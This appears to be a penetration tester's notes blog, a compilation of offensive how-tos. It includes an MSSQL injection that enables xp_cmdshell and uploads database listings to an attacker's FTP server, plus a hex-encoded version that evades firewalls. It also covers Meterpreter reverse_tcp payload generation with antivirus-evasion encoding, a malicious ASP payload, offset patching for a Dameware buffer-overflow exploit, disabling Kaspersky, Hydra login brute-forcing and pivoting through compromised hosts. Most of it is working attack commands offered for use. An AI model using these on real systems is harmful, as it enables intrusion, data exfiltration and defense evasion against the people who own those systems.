SQL Injection to Compromise OS

MSSQL Injection example to communicate with FTP server. The following POC can be extended to download/upload and execute Metasploit payloads to perform backdoors and reverse tcp connections. Discovered this with a customer who was directly compromised by this very attack vector:

Requirements: MSSQL running on System level (or equivalent) privileges. Where xp_* has not been ripped out.

Here is the query in its entirety:

Note: Replace ftp.microsoft.com with your FTP server, and user and password with your username and password.

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; exec master..xp_cmdshell 'mkdir temp& (echo open ftp.microsoft.com& echo user& echo password& echo binary& echo lcd temp& echo put file.txt file.txt& echo bye)>temp\ftpcommand.txt & (bcp "select name,dbid,crdate from master.dbo.sysdatabases" queryout b.txt -c -T & type b.txt& del b.txt) > temp\file.txt 2>&1 & ftp -s:temp\f3.txt & rmdir /S /Q temp';--

Break down:

Step 1 : Enable xp_cmdshell which is disabled by default on many SQL servers (2005):

sp_configure 'show advanced options', 1;

RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;

RECONFIGURE;

Step 2: Create temporary directory:

exec master..xp_cmdshell 'mkdir temp&

Step 3: Create preset of FTP commands for execution. We will see this in the next step.

(echo open ftp.microsoft.com& echo user& echo password& echo binary& echo lcd temp& echo put file.txt file.txt& echo bye)>temp\ftpcommand.txt &

Step 4: Query MSSQL to show all Database and pipe into file.txt. FTP results to your server given the commands we created in Step 3:

(bcp "select name,dbid,crdate from master.dbo.sysdatabases" queryout b.txt -c -T & type b.txt& del b.txt) > temp\file.txt 2>&1 & ftp -s:temp\ftpcommand.txt & rmdir /S /Q temp';--

Recap:

This command essentially create a temporary directory "temp", pipes in a preset of FTP commands to upload file file.txt. It will then run a SQL query to pipe in the list database command into the temporary file. This file is then uploaded to the FTP server via ftp -s:temp\f3.txt which is the preset FTP commands defined. Subsequent clean up at the end (rmdir).

You can obviously expand this to upload/download backdoors to initiate reverse_tcp connections.

Additionally, some trivial obfuscation to mask the query with a hex encode, store it in a variable, then pipe that variable into "exec" to bypass primitive application firewalls that may key off on basic search strings:

declare @q varchar(8000) select @q = 0x455845432073705f636f6e666967757265202773686f7720616476616e636564206f7074696f6e73272c20313b5245434f4e4649475552453b455845432073705f636f6e666967757265202778705f636d647368656c6c272c20313b5245434f4e4649475552453b2065786563206d61737465722e2e78705f636d647368656c6c20276d6b6469722074656d702620286563686f206f70656e206674702e6d6963726f736f66742e636f6d26206563686f207573657226206563686f2070617373776f726426206563686f2062696e61727926206563686f206c63642074656d7026206563686f207075742066696c652e7478742066696c652e74787426206563686f20627965293e74656d705c667470636f6d6d616e642e74787420262028626370202273656c656374206e616d652c646269642c6372646174652066726f6d206d61737465722e64626f2e737973646174616261736573222071756572796f757420622e747874202d63202d542026207479706520622e747874262064656c20622e74787429203e2074656d705c66696c652e74787420323e2631202620667470202d733a74656d705c66332e747874202620726d646972202f53202f512074656d70273b2d2d exec(@q)

Bypassing AV with msfencode

Example of encoding with shikata, 10 iterations.

./msfpayload windows/meterpreter/reverse_tcp LHOST=[local_ip] LPORT=8888 r | msfencode -t exe -e x86/shikata_ga_nai -c 10 -o novacoast_encoded.exe

Scanning through Meterpreter and SSH Tunnel

By Mark Baggett


The Players
Attacker 172.16.186.132
Victim 172.16.186.126

Step 1 - After you have meterpreter access install OpenSSH on the victim's computer. Joff Thyer, packet guru, crazy aussie and all around smart guy did a great job of outlining the install process on his blog. I pretty much just followed his instructions here.

Step 2 - After you've installed OpenSSH and setup your account use Meterpreters PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example:

meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22

(Notes to self: alternatively without Meterpreter: ssh -L 8000:localhost:22 username@victim)

This command sets up a listener on port 8000 of the attacker's IP (172.16.186.132) and forwards packets to port 22 on the victim's machine (172.16.186.128).


Step 3 - SSH into the portfwd port you just created and setup a dynamic port forwarder on your machine. For example:

# ssh -D 127.0.0.1:9000 -p 8000 username@172.16.186.132

(My own notes: ssh -D 127.0.0.1:9000 -p 8000 username@attackermachine)

This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.

Step 4 - Use PROXYCHAINS to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:

# proxychains /usr/sbin/nessusd -D

Step 5 - Start the nessus client and do you scan.

Dameware Mini Remote Control Client Agent Exploit Windows XP SP3

/Start update 3/2/2011

http://www.milw0rm.com/exploits/1190 (obsolete)

http://www.exploit-db.com/exploits/1190/

After updating to latest SP3 hotfixes and patches, the memory address for "jmp esp" is changed again on kernel32.dll.

At the time of this post, the new memory is:
0x7C874413

/End update

An oldy, but during a pentest the client had an old version of Dameware, however running on Windows XP SP3 (not supported) by the following above code.

In the following lines where the code defines its static offset addresses to locate the "jmp esp" command:

target_os[] = ...

"WIN XP" ,{{ 0x71ab7bfb,"kernel32.dll" },{ 0x71ab7bfb,"ws2_32.dll" },{ 0x7C941EED,"ws2_32.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},

...

We can see that item "3" is set to 0x00000000 and unknown.dll. This placeholder is for XP SP3.

Using Immunity Debugger and sifting through Dameware's modules, I found that it is using kernel32.dll 's jmp esp.

Thus, replace item 3 with 0x7C86467B, "kernel32.dll" to effectively altering the script to support Windows XP SP3.

Like most Buffer Overflow exploits, this one, you only get one shot before nuking the service. Thus, double check and test the exploit before carrying it out.

Tabnabbing

New type of phishing. This is ingenius:

http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/

BRO IDS

From UC Berkeley, IDS:

http://www.bro-ids.org/

Port sweep

Quick and dirty portsweep script:

#!/bin/sh

if [ "$1" == "" ] || [ "$2" == "" ]
then
echo "./port_scan.sh [hostlist_file] [port]"
else

for host in `cat $1`
do
echo "scanning $host"
nmap -oG $host-$2.out -v $host/24 -p$2 -P0
done

grep open *$2.out | cut -d" " -f2 > $2.lst
fi

*.lst contains a list of IPs only.

Network Printer Hacking

http://www.irongeek.com/i.php?page=security/networkprinterhacking

Cross-Compiling on BT4

#cd /root/.wine/drive_c/MinGW/bin
#wine gcc.exe [file].c -o [output]

Often times the code will use winsock (for initiating shells over TCP), in this case use the lws2_32 flag:
-lws2_32

#wine gcc.exe [file].c -o [output] -lws2_32

Converting and Merging capture (.cap) files

Convert:

ivstools --convert [cap_file] [converted_file_name]

ivstools --convert [airportSniff2NfxpB.cap] [sniff.ivs]

Merging:

ivstools --merge [ivs_file1] [ivs_file2] ... [merged_output_file_name]

ivstools --merge sniff1.ivs sniff2.ivs sniff_out.ivs

Piping JTR to Aircrack

./john -incremental=All --stdout | aircrack-ng - e [ssid] -w - [capture_file]

Ex:

/pentest/passwords/jtr/john -incremental=All --stdout | aircrack-ng -e linksys4800 -w - airportSniffT7T3Rh.cap

Use OS X Airport for wireless sniffing

Scan for networks:

/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en1 scan

Sniff:

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport sniff

Create a symbolic link to the binary so you can easily execute it from your path if you wish.

Resultant sniff will dump the *.cap file in /tmp. Use aircrack-ng to crack the cap file now once you've captured enough IVs and/or handshake.

Disabling Kaspersky via CatchMe.exe

Kaspersky Anti-Virus is a pain such that Meterpreter cannot disable it via the command "killav". Administrative privs still does not give you enough permissions because the Anti Virus nests itself into the kernel.

Use CatchMe.exe

The following is destructive, read more about CatchMe before issuing the commands:

catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" [file]

reboot

or

attempt to remove catchme.exe from memory with: Darkspy, Seem, Icesword GUI

Above information found here in a nice Meterpreter cheatsheet:

http://www.rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html

Samba 2.2.x Exploit

A nice oldie that worked for me:
http://www.milw0rm.com/exploits/7

From Nessus:
Samba <>

An attacker needs to be able to access at least one share to exploit
this flaw.

In addition, it is reported that Samba contains a flaw
related to the handling of .reg files that may allow
a local user to overwrite arbitrary file.

Usage:
./samba_2.2.8_bufferoverflow.pl -tlinx86 -H [local_ip] -h[victim_ip]

THC-Hydra HTTP-POST-FORM bug

On BackTrack Final 4, there is a bug with Hydra that will prevent you from brute forcing HTTP-POST/GET forms. See following description:

http://bugs.gentoo.org/209116

To solve:

Download source:

http://freeworld.thc.org/releases/hydra-5.4-src.tar.gz

Get patch:

http://bugs.gentoo.org/attachment.cgi?id=142799

Apply patch:

$[path_to_hydra_src] < patch -p1 [patch_file]

$./configure

$ make

$ sudo make install

You may receive a libssh error like I did. This was a bug in the pre-final release of BackTrack. To apply the libssh patch download:

http://0xbadc0de.be/libssh/hydra-libssh0.2.patch

Patch again:

$[path_to_hydra_src] < patch -p1 [patch_file]

$./configure

$ make

$ sudo make install

Example command:

hydra -t2 -e ns -L ~/projects/offsec/users.txt -P ~/projects/offsec/passwords.txt -f 192.168.11.223 http-post-form "/flatfilelogin/login.php:username=^USER^&password=^PASS^&submit=Login:Incorrect" -V

Where /flatfilelogin/login.php is the POST BACK action form.

username is username's input field form ID

password is the password's input field form ID

Incorrect is the bad display image. Note: You should check whether this string is returned back by the post back page, otherwise Hydra will return always as successful.

Note to self: If you are receiving false positives, check for other potential hidden POST form fields to also include.

Additional details.

SSH Tunneling

Using a machine as a pivot/proxy, we need to make an unrouteable remote machine's service routeable. Following example tunnels port 445.

My IP: 192.168.10.88

Machine 1: 192.168.11.72 //We have access to this machine. Has route to machine 2

Machine 2: 10.2.2.50 //Unrouteable from my local machine

On Machine 1, create the tunnel to map remote TCP port 445 to my machine's local TCP port 445.

$ssh -l [local_username] -R [local_port]:[remote_ip]:[remote_port] [local_ip]

$ssh -l liuser -R 445:10.2.2.50:445 192.168.10.88

Confirm with netstat -nat for listening port.

Commonly used for exploiting unrouteable services.

SNMP Set Example command

Following command will set the "sysContact.o" attribute to Novacoast

$snmpset -v2c -c private [target_machine] SNMPv2-MIB::sysContact.0 s Novacoast

SNMPv2-MIB::sysContact.0 = STRING: Novacoast

Re-query to check the set was successful:

$ snmpwalk -v2c -c private [target_machine] | grep sysContact

SNMPv2-MIB::sysContact.0 = STRING: Novacoast

Metasploit Meterpreter Evil ASP

ASP:

./msfpayload windows/meterpreter/reverse_tcp LHOST=[local_ip] LPORT=[local_port] R | msfencode -o evil_liuser.asp

$msfconsole

msf > use exploit/multi/handler

msf > set PAYLOAD windows/meterpreter/reverse_tcp

msf > set LHOST [localhost_ip]

msf > exploit

Execute evil_liuser.asp via browser.

Metasploit Meterpreter Windows Executable Payload

Creating the payload executable:

./msfpayload windows/meterpreter/reverse_tcp LHOST=[localhost_ip] LPORT=[local_port] X > metyay.exe

$msfconsole

msf > use exploit/multi/handler

msf > set PAYLOAD windows/meterpreter/reverse_tcp

msf > LHOST [localhost_ip]

msf > exploit

Run metyay.exe on victim machine.